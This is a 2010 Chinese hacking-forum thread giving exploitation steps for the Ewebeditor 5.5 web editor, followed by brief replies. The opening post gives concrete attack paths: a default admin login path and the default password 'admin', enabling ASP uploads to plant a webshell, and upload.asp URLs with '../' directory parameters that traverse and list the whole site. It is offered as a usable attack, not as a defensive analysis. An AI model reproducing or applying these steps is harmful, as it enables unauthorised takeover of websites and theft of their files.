返回列表 发帖
hyrz

Rank: 9Rank: 9Rank: 9

帖子
253 
积分
742 
威望
1111  
金钱
841  
在线时间
30 小时 

管理组成员
1 跳转到 » 倒序看帖
打印
tT
发表于 2010-6-22 14:51 | 只看该作者

Ewebeditor 5.5 列目录漏洞利用方法

Ewebeditor, 漏洞, 目录
发布时间:2010-01-11

影响版本:Ewebeditor 5.5

发布作者:udb311 from 黑白前线

漏洞描述:

利用方法1:

后台登录:ewebeditor5.5 默认后台/admin/ewebeditor/admin/login.asp 默认密码admin

添加上传类型asp,调用用样式上传页ewebeditor/ewebeditor.htm?id=body&style=popup直接上传asp大马。



利用方法2:

进入后台,ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=../一级跳转目录

ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=../../二级跳转目录

可遍历网站所有目录文件。
收藏 分享

qnbs1

Rank: 1

帖子
32 
积分
37 
威望
33  
金钱
43  
在线时间
2 小时 
2
发表于 2010-6-23 09:10 | 只看该作者
这个我看过

TOP

qnbs1

Rank: 1

帖子
32 
积分
37 
威望
33  
金钱
43  
在线时间
2 小时 
3
发表于 2010-6-23 09:15 | 只看该作者
这个我看过

TOP

MonsT.R-凌乱

Rank: 1

帖子
积分
威望
3  
金钱
13  
在线时间
0 小时 
4
发表于 2010-6-24 00:24 | 只看该作者
5.5版本还没见过了
有待测试

TOP

返回列表